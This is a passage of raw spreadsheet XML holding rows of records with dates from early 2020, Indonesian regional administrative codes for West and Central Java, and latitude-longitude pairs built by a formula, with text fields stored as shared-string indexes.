      <c r="S2014" t="s">
        <v>41</v>
      </c>
      <c r="T2014" t="s">
        <v>42</v>
      </c>
      <c r="U2014" s="5">
        <v>10695151</v>
      </c>
      <c r="V2014" s="5" t="s">
        <v>16244</v>
      </c>
      <c r="W2014" s="5">
        <v>-621925</v>
      </c>
      <c r="X2014" t="s">
        <v>19998</v>
      </c>
      <c r="Y2014" t="str">
        <f t="shared" si="31"/>
        <v>-6.21925,106.95151</v>
      </c>
    </row>
    <row r="2015" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2015">
        <v>180153</v>
      </c>
      <c r="B2015" s="1">
        <v>43915</v>
      </c>
      <c r="C2015" t="s">
        <v>6514</v>
      </c>
      <c r="D2015" t="s">
        <v>85</v>
      </c>
      <c r="E2015" t="s">
        <v>23</v>
      </c>
      <c r="F2015" t="s">
        <v>6729</v>
      </c>
      <c r="G2015" t="s">
        <v>6730</v>
      </c>
      <c r="H2015" t="s">
        <v>26</v>
      </c>
      <c r="J2015" t="s">
        <v>2627</v>
      </c>
      <c r="K2015" t="s">
        <v>6731</v>
      </c>
      <c r="L2015" t="s">
        <v>6732</v>
      </c>
      <c r="M2015">
        <v>3276031005</v>
      </c>
      <c r="N2015">
        <v>3276031</v>
      </c>
      <c r="O2015">
        <v>3276</v>
      </c>
      <c r="P2015">
        <v>32</v>
      </c>
      <c r="Q2015" t="s">
        <v>6733</v>
      </c>
      <c r="R2015" t="s">
        <v>6734</v>
      </c>
      <c r="S2015" t="s">
        <v>185</v>
      </c>
      <c r="T2015" t="s">
        <v>42</v>
      </c>
      <c r="U2015" s="5">
        <v>10685777</v>
      </c>
      <c r="V2015" s="5" t="s">
        <v>16245</v>
      </c>
      <c r="W2015" s="5">
        <v>-641977</v>
      </c>
      <c r="X2015" t="s">
        <v>19999</v>
      </c>
      <c r="Y2015" t="str">
        <f t="shared" si="31"/>
        <v>-6.41977,106.85777</v>
      </c>
    </row>
    <row r="2016" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2016">
        <v>180154</v>
      </c>
      <c r="B2016" s="1">
        <v>43916</v>
      </c>
      <c r="C2016" t="s">
        <v>6481</v>
      </c>
      <c r="D2016" t="s">
        <v>22</v>
      </c>
      <c r="E2016" t="s">
        <v>23</v>
      </c>
      <c r="F2016" t="s">
        <v>6735</v>
      </c>
      <c r="H2016" t="s">
        <v>26</v>
      </c>
      <c r="I2016" t="s">
        <v>166</v>
      </c>
      <c r="J2016" t="s">
        <v>2627</v>
      </c>
      <c r="L2016" t="s">
        <v>6736</v>
      </c>
      <c r="M2016">
        <v>3273020003</v>
      </c>
      <c r="N2016">
        <v>3273020</v>
      </c>
      <c r="O2016">
        <v>3273</v>
      </c>
      <c r="P2016">
        <v>32</v>
      </c>
      <c r="Q2016" t="s">
        <v>6737</v>
      </c>
      <c r="R2016" t="s">
        <v>6738</v>
      </c>
      <c r="S2016" t="s">
        <v>1464</v>
      </c>
      <c r="T2016" t="s">
        <v>42</v>
      </c>
      <c r="U2016" s="5">
        <v>10758710</v>
      </c>
      <c r="V2016" s="5" t="s">
        <v>16246</v>
      </c>
      <c r="W2016" s="5">
        <v>-694952</v>
      </c>
      <c r="X2016" t="s">
        <v>20000</v>
      </c>
      <c r="Y2016" t="str">
        <f t="shared" si="31"/>
        <v>-6.94952,107.58710</v>
      </c>
    </row>
    <row r="2017" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2017">
        <v>180155</v>
      </c>
      <c r="B2017" s="1">
        <v>43916</v>
      </c>
      <c r="C2017" t="s">
        <v>6481</v>
      </c>
      <c r="D2017" t="s">
        <v>22</v>
      </c>
      <c r="E2017" t="s">
        <v>23</v>
      </c>
      <c r="F2017" t="s">
        <v>6739</v>
      </c>
      <c r="H2017" t="s">
        <v>26</v>
      </c>
      <c r="I2017" t="s">
        <v>2293</v>
      </c>
      <c r="J2017" t="s">
        <v>2627</v>
      </c>
      <c r="L2017" t="s">
        <v>6740</v>
      </c>
      <c r="M2017">
        <v>3273180006</v>
      </c>
      <c r="N2017">
        <v>3273180</v>
      </c>
      <c r="O2017">
        <v>3273</v>
      </c>
      <c r="P2017">
        <v>32</v>
      </c>
      <c r="Q2017" t="s">
        <v>31</v>
      </c>
      <c r="R2017" t="s">
        <v>1731</v>
      </c>
      <c r="S2017" t="s">
        <v>1464</v>
      </c>
      <c r="T2017" t="s">
        <v>42</v>
      </c>
      <c r="U2017" s="5">
        <v>10760302</v>
      </c>
      <c r="V2017" s="5" t="s">
        <v>15673</v>
      </c>
      <c r="W2017" s="5">
        <v>-691984</v>
      </c>
      <c r="X2017" t="s">
        <v>19450</v>
      </c>
      <c r="Y2017" t="str">
        <f t="shared" si="31"/>
        <v>-6.91984,107.60302</v>
      </c>
    </row>
    <row r="2018" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2018">
        <v>180156</v>
      </c>
      <c r="B2018" s="1">
        <v>43916</v>
      </c>
      <c r="C2018" t="s">
        <v>6617</v>
      </c>
      <c r="D2018" t="s">
        <v>22</v>
      </c>
      <c r="E2018" t="s">
        <v>23</v>
      </c>
      <c r="F2018" t="s">
        <v>6741</v>
      </c>
      <c r="G2018" t="s">
        <v>6742</v>
      </c>
      <c r="H2018" t="s">
        <v>26</v>
      </c>
      <c r="I2018" t="s">
        <v>1991</v>
      </c>
      <c r="J2018" t="s">
        <v>2627</v>
      </c>
      <c r="L2018" t="s">
        <v>6743</v>
      </c>
      <c r="M2018">
        <v>3201190010</v>
      </c>
      <c r="N2018">
        <v>3201190</v>
      </c>
      <c r="O2018">
        <v>3201</v>
      </c>
      <c r="P2018">
        <v>32</v>
      </c>
      <c r="Q2018" t="s">
        <v>419</v>
      </c>
      <c r="R2018" t="s">
        <v>420</v>
      </c>
      <c r="S2018" t="s">
        <v>421</v>
      </c>
      <c r="T2018" t="s">
        <v>42</v>
      </c>
      <c r="U2018" s="5">
        <v>10696993</v>
      </c>
      <c r="V2018" s="5" t="s">
        <v>15538</v>
      </c>
      <c r="W2018" s="5">
        <v>-630355</v>
      </c>
      <c r="X2018" t="s">
        <v>20001</v>
      </c>
      <c r="Y2018" t="str">
        <f t="shared" si="31"/>
        <v>-6.30355,106.96993</v>
      </c>
    </row>
    <row r="2019" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2019">
        <v>180158</v>
      </c>
      <c r="B2019" s="1">
        <v>43920</v>
      </c>
      <c r="C2019" t="s">
        <v>6481</v>
      </c>
      <c r="D2019" t="s">
        <v>22</v>
      </c>
      <c r="E2019" t="s">
        <v>23</v>
      </c>
      <c r="F2019" t="s">
        <v>6744</v>
      </c>
      <c r="G2019" t="s">
        <v>6745</v>
      </c>
      <c r="H2019" t="s">
        <v>26</v>
      </c>
      <c r="I2019" t="s">
        <v>3029</v>
      </c>
      <c r="J2019" t="s">
        <v>2627</v>
      </c>
      <c r="L2019" t="s">
        <v>6746</v>
      </c>
      <c r="M2019">
        <v>3204260005</v>
      </c>
      <c r="N2019">
        <v>3204260</v>
      </c>
      <c r="O2019">
        <v>3204</v>
      </c>
      <c r="P2019">
        <v>32</v>
      </c>
      <c r="Q2019" t="s">
        <v>6747</v>
      </c>
      <c r="R2019" t="s">
        <v>2956</v>
      </c>
      <c r="S2019" t="s">
        <v>1464</v>
      </c>
      <c r="T2019" t="s">
        <v>42</v>
      </c>
      <c r="U2019" s="5">
        <v>10757314</v>
      </c>
      <c r="V2019" s="5" t="s">
        <v>16247</v>
      </c>
      <c r="W2019" s="5">
        <v>-696342</v>
      </c>
      <c r="X2019" t="s">
        <v>20002</v>
      </c>
      <c r="Y2019" t="str">
        <f t="shared" si="31"/>
        <v>-6.96342,107.57314</v>
      </c>
    </row>
    <row r="2020" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2020">
        <v>180159</v>
      </c>
      <c r="B2020" s="1">
        <v>43920</v>
      </c>
      <c r="C2020" t="s">
        <v>6679</v>
      </c>
      <c r="D2020" t="s">
        <v>85</v>
      </c>
      <c r="E2020" t="s">
        <v>23</v>
      </c>
      <c r="F2020" t="s">
        <v>6748</v>
      </c>
      <c r="G2020" t="s">
        <v>6749</v>
      </c>
      <c r="H2020" t="s">
        <v>26</v>
      </c>
      <c r="J2020" t="s">
        <v>2627</v>
      </c>
      <c r="K2020" t="s">
        <v>6750</v>
      </c>
      <c r="L2020" t="s">
        <v>6751</v>
      </c>
      <c r="M2020">
        <v>3211010009</v>
      </c>
      <c r="N2020">
        <v>3211010</v>
      </c>
      <c r="O2020">
        <v>3211</v>
      </c>
      <c r="P2020">
        <v>32</v>
      </c>
      <c r="Q2020" t="s">
        <v>2951</v>
      </c>
      <c r="R2020" t="s">
        <v>2952</v>
      </c>
      <c r="S2020" t="s">
        <v>1797</v>
      </c>
      <c r="T2020" t="s">
        <v>42</v>
      </c>
      <c r="U2020" s="5">
        <v>10777668</v>
      </c>
      <c r="V2020" s="5" t="s">
        <v>15129</v>
      </c>
      <c r="W2020" s="5">
        <v>-694315</v>
      </c>
      <c r="X2020" t="s">
        <v>18930</v>
      </c>
      <c r="Y2020" t="str">
        <f t="shared" si="31"/>
        <v>-6.94315,107.77668</v>
      </c>
    </row>
    <row r="2021" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2021">
        <v>180160</v>
      </c>
      <c r="B2021" s="1">
        <v>43920</v>
      </c>
      <c r="C2021" t="s">
        <v>6481</v>
      </c>
      <c r="D2021" t="s">
        <v>22</v>
      </c>
      <c r="E2021" t="s">
        <v>23</v>
      </c>
      <c r="F2021" t="s">
        <v>6752</v>
      </c>
      <c r="G2021" t="s">
        <v>6753</v>
      </c>
      <c r="H2021" t="s">
        <v>26</v>
      </c>
      <c r="I2021" t="s">
        <v>1624</v>
      </c>
      <c r="J2021" t="s">
        <v>2627</v>
      </c>
      <c r="L2021" t="s">
        <v>6754</v>
      </c>
      <c r="M2021">
        <v>3273101002</v>
      </c>
      <c r="N2021">
        <v>3273101</v>
      </c>
      <c r="O2021">
        <v>3273</v>
      </c>
      <c r="P2021">
        <v>32</v>
      </c>
      <c r="Q2021" t="s">
        <v>6755</v>
      </c>
      <c r="R2021" t="s">
        <v>6756</v>
      </c>
      <c r="S2021" t="s">
        <v>1464</v>
      </c>
      <c r="T2021" t="s">
        <v>42</v>
      </c>
      <c r="U2021" s="5">
        <v>10770976</v>
      </c>
      <c r="V2021" s="5" t="s">
        <v>16248</v>
      </c>
      <c r="W2021" s="5">
        <v>-696108</v>
      </c>
      <c r="X2021" t="s">
        <v>20003</v>
      </c>
      <c r="Y2021" t="str">
        <f t="shared" si="31"/>
        <v>-6.96108,107.70976</v>
      </c>
    </row>
    <row r="2022" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2022">
        <v>180161</v>
      </c>
      <c r="B2022" s="1">
        <v>43920</v>
      </c>
      <c r="C2022" t="s">
        <v>6481</v>
      </c>
      <c r="D2022" t="s">
        <v>22</v>
      </c>
      <c r="E2022" t="s">
        <v>23</v>
      </c>
      <c r="F2022" t="s">
        <v>6757</v>
      </c>
      <c r="G2022" t="s">
        <v>6758</v>
      </c>
      <c r="H2022" t="s">
        <v>26</v>
      </c>
      <c r="I2022" t="s">
        <v>517</v>
      </c>
      <c r="J2022" t="s">
        <v>2627</v>
      </c>
      <c r="M2022">
        <v>3204270005</v>
      </c>
      <c r="N2022">
        <v>3204270</v>
      </c>
      <c r="O2022">
        <v>3204</v>
      </c>
      <c r="P2022">
        <v>32</v>
      </c>
      <c r="Q2022" t="s">
        <v>1811</v>
      </c>
      <c r="R2022" t="s">
        <v>1785</v>
      </c>
      <c r="S2022" t="s">
        <v>1464</v>
      </c>
      <c r="T2022" t="s">
        <v>42</v>
      </c>
      <c r="U2022" s="5">
        <v>10763061</v>
      </c>
      <c r="V2022" s="5" t="s">
        <v>16249</v>
      </c>
      <c r="W2022" s="5">
        <v>-697970</v>
      </c>
      <c r="X2022" t="s">
        <v>20004</v>
      </c>
      <c r="Y2022" t="str">
        <f t="shared" si="31"/>
        <v>-6.97970,107.63061</v>
      </c>
    </row>
    <row r="2023" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2023">
        <v>180162</v>
      </c>
      <c r="B2023" s="1">
        <v>43920</v>
      </c>
      <c r="C2023" t="s">
        <v>6481</v>
      </c>
      <c r="D2023" t="s">
        <v>22</v>
      </c>
      <c r="E2023" t="s">
        <v>23</v>
      </c>
      <c r="F2023" t="s">
        <v>6759</v>
      </c>
      <c r="G2023" t="s">
        <v>6760</v>
      </c>
      <c r="H2023" t="s">
        <v>26</v>
      </c>
      <c r="I2023" t="s">
        <v>27</v>
      </c>
      <c r="J2023" t="s">
        <v>2627</v>
      </c>
      <c r="L2023" t="s">
        <v>6761</v>
      </c>
      <c r="M2023">
        <v>3273130003</v>
      </c>
      <c r="N2023">
        <v>3273130</v>
      </c>
      <c r="O2023">
        <v>3273</v>
      </c>
      <c r="P2023">
        <v>32</v>
      </c>
      <c r="Q2023" t="s">
        <v>6762</v>
      </c>
      <c r="R2023" t="s">
        <v>6763</v>
      </c>
      <c r="S2023" t="s">
        <v>1464</v>
      </c>
      <c r="T2023" t="s">
        <v>42</v>
      </c>
      <c r="U2023" s="5">
        <v>10766854</v>
      </c>
      <c r="V2023" s="5" t="s">
        <v>16250</v>
      </c>
      <c r="W2023" s="5">
        <v>-691534</v>
      </c>
      <c r="X2023" t="s">
        <v>20005</v>
      </c>
      <c r="Y2023" t="str">
        <f t="shared" si="31"/>
        <v>-6.91534,107.66854</v>
      </c>
    </row>
    <row r="2024" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2024">
        <v>180163</v>
      </c>
      <c r="B2024" s="1">
        <v>43920</v>
      </c>
      <c r="C2024" t="s">
        <v>6454</v>
      </c>
      <c r="D2024" t="s">
        <v>22</v>
      </c>
      <c r="E2024" t="s">
        <v>23</v>
      </c>
      <c r="F2024" t="s">
        <v>6764</v>
      </c>
      <c r="G2024" t="s">
        <v>6765</v>
      </c>
      <c r="H2024" t="s">
        <v>26</v>
      </c>
      <c r="I2024" t="s">
        <v>1542</v>
      </c>
      <c r="J2024" t="s">
        <v>2627</v>
      </c>
      <c r="L2024" t="s">
        <v>6766</v>
      </c>
      <c r="M2024">
        <v>3273060001</v>
      </c>
      <c r="N2024">
        <v>3273060</v>
      </c>
      <c r="O2024">
        <v>3273</v>
      </c>
      <c r="P2024">
        <v>32</v>
      </c>
      <c r="Q2024" t="s">
        <v>6767</v>
      </c>
      <c r="R2024" t="s">
        <v>6768</v>
      </c>
      <c r="S2024" t="s">
        <v>1464</v>
      </c>
      <c r="T2024" t="s">
        <v>42</v>
      </c>
      <c r="U2024" s="5">
        <v>10761262</v>
      </c>
      <c r="V2024" s="5" t="s">
        <v>16251</v>
      </c>
      <c r="W2024" s="5">
        <v>-695714</v>
      </c>
      <c r="X2024" t="s">
        <v>20006</v>
      </c>
      <c r="Y2024" t="str">
        <f t="shared" si="31"/>
        <v>-6.95714,107.61262</v>
      </c>
    </row>
    <row r="2025" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2025">
        <v>180164</v>
      </c>
      <c r="B2025" s="1">
        <v>43920</v>
      </c>
      <c r="C2025" t="s">
        <v>6454</v>
      </c>
      <c r="D2025" t="s">
        <v>22</v>
      </c>
      <c r="E2025" t="s">
        <v>23</v>
      </c>
      <c r="F2025" t="s">
        <v>6769</v>
      </c>
      <c r="G2025" t="s">
        <v>6770</v>
      </c>
      <c r="H2025" t="s">
        <v>26</v>
      </c>
      <c r="I2025" t="s">
        <v>271</v>
      </c>
      <c r="J2025" t="s">
        <v>2627</v>
      </c>
      <c r="M2025">
        <v>3204260003</v>
      </c>
      <c r="N2025">
        <v>3204260</v>
      </c>
      <c r="O2025">
        <v>3204</v>
      </c>
      <c r="P2025">
        <v>32</v>
      </c>
      <c r="Q2025" t="s">
        <v>6771</v>
      </c>
      <c r="R2025" t="s">
        <v>2956</v>
      </c>
      <c r="S2025" t="s">
        <v>1464</v>
      </c>
      <c r="T2025" t="s">
        <v>42</v>
      </c>
      <c r="U2025" s="5">
        <v>10757317</v>
      </c>
      <c r="V2025" s="5" t="s">
        <v>16252</v>
      </c>
      <c r="W2025" s="5">
        <v>-696267</v>
      </c>
      <c r="X2025" t="s">
        <v>20007</v>
      </c>
      <c r="Y2025" t="str">
        <f t="shared" si="31"/>
        <v>-6.96267,107.57317</v>
      </c>
    </row>
    <row r="2026" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2026">
        <v>180165</v>
      </c>
      <c r="B2026" s="1">
        <v>43920</v>
      </c>
      <c r="C2026" t="s">
        <v>6454</v>
      </c>
      <c r="D2026" t="s">
        <v>22</v>
      </c>
      <c r="E2026" t="s">
        <v>23</v>
      </c>
      <c r="F2026" t="s">
        <v>6772</v>
      </c>
      <c r="G2026" t="s">
        <v>6773</v>
      </c>
      <c r="H2026" t="s">
        <v>26</v>
      </c>
      <c r="I2026" t="s">
        <v>1891</v>
      </c>
      <c r="J2026" t="s">
        <v>2608</v>
      </c>
      <c r="L2026" t="s">
        <v>6774</v>
      </c>
      <c r="M2026">
        <v>3307080019</v>
      </c>
      <c r="N2026">
        <v>3307080</v>
      </c>
      <c r="O2026">
        <v>3307</v>
      </c>
      <c r="P2026">
        <v>33</v>
      </c>
      <c r="Q2026" t="s">
        <v>6775</v>
      </c>
      <c r="R2026" t="s">
        <v>6776</v>
      </c>
      <c r="S2026" t="s">
        <v>6777</v>
      </c>
      <c r="T2026" t="s">
        <v>1134</v>
      </c>
      <c r="U2026" s="5">
        <v>10999878</v>
      </c>
      <c r="V2026" s="5" t="s">
        <v>16253</v>
      </c>
      <c r="W2026" s="5">
        <v>-735692</v>
      </c>
      <c r="X2026" t="s">
        <v>20008</v>
      </c>
      <c r="Y2026" t="str">
        <f t="shared" si="31"/>
        <v>-7.35692,109.99878</v>
      </c>
    </row>
    <row r="2027" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2027">
        <v>180166</v>
      </c>
      <c r="B2027" s="1">
        <v>43920</v>
      </c>
      <c r="C2027" t="s">
        <v>6454</v>
      </c>
      <c r="D2027" t="s">
        <v>22</v>
      </c>
      <c r="E2027" t="s">
        <v>23</v>
      </c>
      <c r="F2027" t="s">
        <v>6778</v>
      </c>
      <c r="G2027" t="s">
        <v>6779</v>
      </c>
      <c r="H2027" t="s">
        <v>26</v>
      </c>
      <c r="I2027" t="s">
        <v>523</v>
      </c>
      <c r="J2027" t="s">
        <v>2627</v>
      </c>
      <c r="L2027" t="s">
        <v>6780</v>
      </c>
      <c r="M2027">
        <v>3204280004</v>
      </c>
      <c r="N2027">
        <v>3204280</v>
      </c>
      <c r="O2027">
        <v>3204</v>
      </c>
      <c r="P2027">
        <v>32</v>
      </c>
      <c r="Q2027" t="s">
        <v>6781</v>
      </c>
      <c r="R2027" t="s">
        <v>1807</v>
      </c>
      <c r="S2027" t="s">
        <v>1464</v>
      </c>
      <c r="T2027" t="s">
        <v>42</v>
      </c>
      <c r="U2027" s="5">
        <v>10765597</v>
      </c>
      <c r="V2027" s="5" t="s">
        <v>16254</v>
      </c>
      <c r="W2027" s="5">
        <v>-697486</v>
      </c>
      <c r="X2027" t="s">
        <v>20009</v>
      </c>
      <c r="Y2027" t="str">
        <f t="shared" si="31"/>
        <v>-6.97486,107.65597</v>
      </c>
    </row>
    <row r="2028" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2028">
        <v>180167</v>
      </c>
      <c r="B2028" s="1">
        <v>43920</v>
      </c>
      <c r="C2028" t="s">
        <v>6454</v>
      </c>
      <c r="D2028" t="s">
        <v>22</v>
      </c>
      <c r="E2028" t="s">
        <v>23</v>
      </c>
      <c r="F2028" t="s">
        <v>6782</v>
      </c>
      <c r="G2028" t="s">
        <v>6783</v>
      </c>
      <c r="H2028" t="s">
        <v>26</v>
      </c>
      <c r="I2028" t="s">
        <v>1689</v>
      </c>
      <c r="J2028" t="s">
        <v>2627</v>
      </c>
      <c r="M2028">
        <v>3273111002</v>
      </c>
      <c r="N2028">
        <v>3273111</v>
      </c>
      <c r="O2028">
        <v>3273</v>
      </c>
      <c r="P2028">
        <v>32</v>
      </c>
      <c r="Q2028" t="s">
        <v>6784</v>
      </c>
      <c r="R2028" t="s">
        <v>6785</v>
      </c>
      <c r="S2028" t="s">
        <v>1464</v>
      </c>
      <c r="T2028" t="s">
        <v>42</v>
      </c>
      <c r="U2028" s="5">
        <v>10770826</v>
      </c>
      <c r="V2028" s="5" t="s">
        <v>16255</v>
      </c>
      <c r="W2028" s="5">
        <v>-694678</v>
      </c>
      <c r="X2028" t="s">
        <v>20010</v>
      </c>
      <c r="Y2028" t="str">
        <f t="shared" si="31"/>
        <v>-6.94678,107.70826</v>
      </c>
    </row>
    <row r="2029" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2029">
        <v>180168</v>
      </c>
      <c r="B2029" s="1">
        <v>43920</v>
      </c>
      <c r="C2029" t="s">
        <v>6454</v>
      </c>
      <c r="D2029" t="s">
        <v>22</v>
      </c>
      <c r="E2029" t="s">
        <v>23</v>
      </c>
      <c r="F2029" t="s">
        <v>6786</v>
      </c>
      <c r="H2029" t="s">
        <v>26</v>
      </c>
      <c r="I2029" t="s">
        <v>6787</v>
      </c>
      <c r="J2029" t="s">
        <v>2627</v>
      </c>
      <c r="L2029" t="s">
        <v>6788</v>
      </c>
      <c r="M2029">
        <v>3204140003</v>
      </c>
      <c r="N2029">
        <v>3204140</v>
      </c>
      <c r="O2029">
        <v>3204</v>
      </c>
      <c r="P2029">
        <v>32</v>
      </c>
      <c r="Q2029" t="s">
        <v>1732</v>
      </c>
      <c r="R2029" t="s">
        <v>1732</v>
      </c>
      <c r="S2029" t="s">
        <v>1464</v>
      </c>
      <c r="T2029" t="s">
        <v>42</v>
      </c>
      <c r="U2029" s="5">
        <v>10762610</v>
      </c>
      <c r="V2029" s="5" t="s">
        <v>16256</v>
      </c>
      <c r="W2029" s="5">
        <v>-699203</v>
      </c>
      <c r="X2029" t="s">
        <v>20011</v>
      </c>
      <c r="Y2029" t="str">
        <f t="shared" si="31"/>
        <v>-6.99203,107.62610</v>
      </c>
    </row>
    <row r="2030" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2030">
        <v>180169</v>
      </c>
      <c r="B2030" s="1">
        <v>43920</v>
      </c>
      <c r="C2030" t="s">
        <v>6617</v>
      </c>
      <c r="D2030" t="s">
        <v>22</v>
      </c>
      <c r="E2030" t="s">
        <v>23</v>
      </c>
      <c r="F2030" t="s">
        <v>6789</v>
      </c>
      <c r="H2030" t="s">
        <v>26</v>
      </c>
      <c r="I2030" t="s">
        <v>1359</v>
      </c>
      <c r="J2030" t="s">
        <v>2627</v>
      </c>
      <c r="L2030" t="s">
        <v>6790</v>
      </c>
      <c r="M2030">
        <v>3273090001</v>
      </c>
      <c r="N2030">
        <v>3273090</v>
      </c>
      <c r="O2030">
        <v>3273</v>
      </c>
      <c r="P2030">
        <v>32</v>
      </c>
      <c r="Q2030" t="s">
        <v>6791</v>
      </c>
      <c r="R2030" t="s">
        <v>1468</v>
      </c>
      <c r="S2030" t="s">
        <v>1464</v>
      </c>
      <c r="T2030" t="s">
        <v>42</v>
      </c>
      <c r="U2030" s="5">
        <v>10765234</v>
      </c>
      <c r="V2030" s="5" t="s">
        <v>16257</v>
      </c>
      <c r="W2030" s="5">
        <v>-696038</v>
      </c>
      <c r="X2030" t="s">
        <v>20012</v>
      </c>
      <c r="Y2030" t="str">
        <f t="shared" si="31"/>
        <v>-6.96038,107.65234</v>
      </c>
    </row>
    <row r="2031" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2031">
        <v>180170</v>
      </c>
      <c r="B2031" s="1">
        <v>43920</v>
      </c>
      <c r="C2031" t="s">
        <v>6617</v>
      </c>
      <c r="D2031" t="s">
        <v>22</v>
      </c>
      <c r="E2031" t="s">
        <v>23</v>
      </c>
      <c r="F2031" t="s">
        <v>6792</v>
      </c>
      <c r="G2031" t="s">
        <v>6793</v>
      </c>
      <c r="H2031" t="s">
        <v>26</v>
      </c>
      <c r="I2031" t="s">
        <v>1909</v>
      </c>
      <c r="J2031" t="s">
        <v>2627</v>
      </c>
      <c r="M2031">
        <v>3204280002</v>
      </c>
      <c r="N2031">
        <v>3204280</v>
      </c>
      <c r="O2031">
        <v>3204</v>
      </c>
      <c r="P2031">
        <v>32</v>
      </c>
      <c r="Q2031" t="s">
        <v>1807</v>
      </c>
      <c r="R2031" t="s">
        <v>1807</v>
      </c>
      <c r="S2031" t="s">
        <v>1464</v>
      </c>
      <c r="T2031" t="s">
        <v>42</v>
      </c>
      <c r="U2031" s="5">
        <v>10763688</v>
      </c>
      <c r="V2031" s="5" t="s">
        <v>16258</v>
      </c>
      <c r="W2031" s="5">
        <v>-698456</v>
      </c>
      <c r="X2031" t="s">
        <v>20013</v>
      </c>
      <c r="Y2031" t="str">
        <f t="shared" si="31"/>
        <v>-6.98456,107.63688</v>
      </c>
    </row>
    <row r="2032" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2032">
        <v>180171</v>
      </c>
      <c r="B2032" s="1">
        <v>43920</v>
      </c>
      <c r="C2032" t="s">
        <v>6488</v>
      </c>
      <c r="D2032" t="s">
        <v>22</v>
      </c>
      <c r="E2032" t="s">
        <v>23</v>
      </c>
      <c r="F2032" t="s">
        <v>6794</v>
      </c>
      <c r="H2032" t="s">
        <v>26</v>
      </c>
      <c r="I2032" t="s">
        <v>80</v>
      </c>
      <c r="J2032" t="s">
        <v>2627</v>
      </c>
      <c r="L2032" t="s">
        <v>6795</v>
      </c>
      <c r="M2032">
        <v>3204270005</v>
      </c>
      <c r="N2032">
        <v>3204270</v>
      </c>
      <c r="O2032">
        <v>3204</v>
      </c>
      <c r="P2032">
        <v>32</v>
      </c>
      <c r="Q2032" t="s">
        <v>1811</v>
      </c>
      <c r="R2032" t="s">
        <v>1785</v>
      </c>
      <c r="S2032" t="s">
        <v>1464</v>
      </c>
      <c r="T2032" t="s">
        <v>42</v>
      </c>
      <c r="U2032" s="5">
        <v>10761883</v>
      </c>
      <c r="V2032" s="5" t="s">
        <v>16259</v>
      </c>
      <c r="W2032" s="5">
        <v>-697591</v>
      </c>
      <c r="X2032" t="s">
        <v>20014</v>
      </c>
      <c r="Y2032" t="str">
        <f t="shared" si="31"/>
        <v>-6.97591,107.61883</v>
      </c>
    </row>
    <row r="2033" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2033">
        <v>180189</v>
      </c>
      <c r="B2033" s="1">
        <v>43922</v>
      </c>
      <c r="C2033">
        <v>0</v>
      </c>
      <c r="D2033" t="s">
        <v>22</v>
      </c>
      <c r="E2033" t="s">
        <v>23</v>
      </c>
      <c r="F2033" t="s">
        <v>6796</v>
      </c>
      <c r="G2033" t="s">
        <v>6797</v>
      </c>
      <c r="H2033" t="s">
        <v>26</v>
      </c>
      <c r="I2033" t="s">
        <v>974</v>
      </c>
      <c r="J2033" t="s">
        <v>2627</v>
      </c>
      <c r="L2033" t="s">
        <v>6798</v>
      </c>
      <c r="M2033">
        <v>3204270004</v>
      </c>
      <c r="N2033">
        <v>3204270</v>
      </c>
      <c r="O2033">
        <v>3204</v>
      </c>
      <c r="P2033">
        <v>32</v>
      </c>
      <c r="Q2033" t="s">
        <v>1785</v>
      </c>
      <c r="R2033" t="s">
        <v>1785</v>
      </c>
      <c r="S2033" t="s">
        <v>1464</v>
      </c>
      <c r="T2033" t="s">
        <v>42</v>
      </c>
      <c r="U2033" s="5">
        <v>10762404</v>
      </c>
      <c r="V2033" s="5" t="s">
        <v>16260</v>
      </c>
      <c r="W2033" s="5">
        <v>-698720</v>
      </c>
      <c r="X2033" t="s">
        <v>20015</v>
      </c>
      <c r="Y2033" t="str">
        <f t="shared" si="31"/>
        <v>-6.98720,107.62404</v>
      </c>
    </row>
    <row r="2034" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2034">
        <v>180190</v>
      </c>
      <c r="B2034" s="1">
        <v>43923</v>
      </c>
      <c r="C2034">
        <v>0</v>
      </c>
      <c r="D2034" t="s">
        <v>85</v>
      </c>
      <c r="E2034" t="s">
        <v>23</v>
      </c>
      <c r="F2034" t="s">
        <v>6799</v>
      </c>
      <c r="G2034" t="s">
        <v>6800</v>
      </c>
      <c r="H2034" t="s">
        <v>26</v>
      </c>
      <c r="J2034" t="s">
        <v>2627</v>
      </c>
      <c r="K2034" t="s">
        <v>6801</v>
      </c>
      <c r="L2034" t="s">
        <v>6802</v>
      </c>
      <c r="M2034">
        <v>3275010010</v>
      </c>
      <c r="N2034">
        <v>3275010</v>
      </c>
      <c r="O2034">
        <v>3275</v>
      </c>
      <c r="P2034">
        <v>32</v>
      </c>
      <c r="Q2034" t="s">
        <v>286</v>
      </c>
      <c r="R2034" t="s">
        <v>287</v>
      </c>
      <c r="S2034" t="s">
        <v>41</v>
      </c>
      <c r="T2034" t="s">
        <v>42</v>
      </c>
      <c r="U2034" s="5">
        <v>10694328</v>
      </c>
      <c r="V2034" s="5" t="s">
        <v>16261</v>
      </c>
      <c r="W2034" s="5">
        <v>-625823</v>
      </c>
      <c r="X2034" t="s">
        <v>20016</v>
      </c>
      <c r="Y2034" t="str">
        <f t="shared" si="31"/>
        <v>-6.25823,106.94328</v>
      </c>
    </row>
    <row r="2035" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2035">
        <v>180191</v>
      </c>
      <c r="B2035" s="1">
        <v>43923</v>
      </c>
      <c r="C2035">
        <v>0</v>
      </c>
      <c r="D2035" t="s">
        <v>22</v>
      </c>
      <c r="E2035" t="s">
        <v>23</v>
      </c>
      <c r="F2035" t="s">
        <v>6803</v>
      </c>
      <c r="H2035" t="s">
        <v>26</v>
      </c>
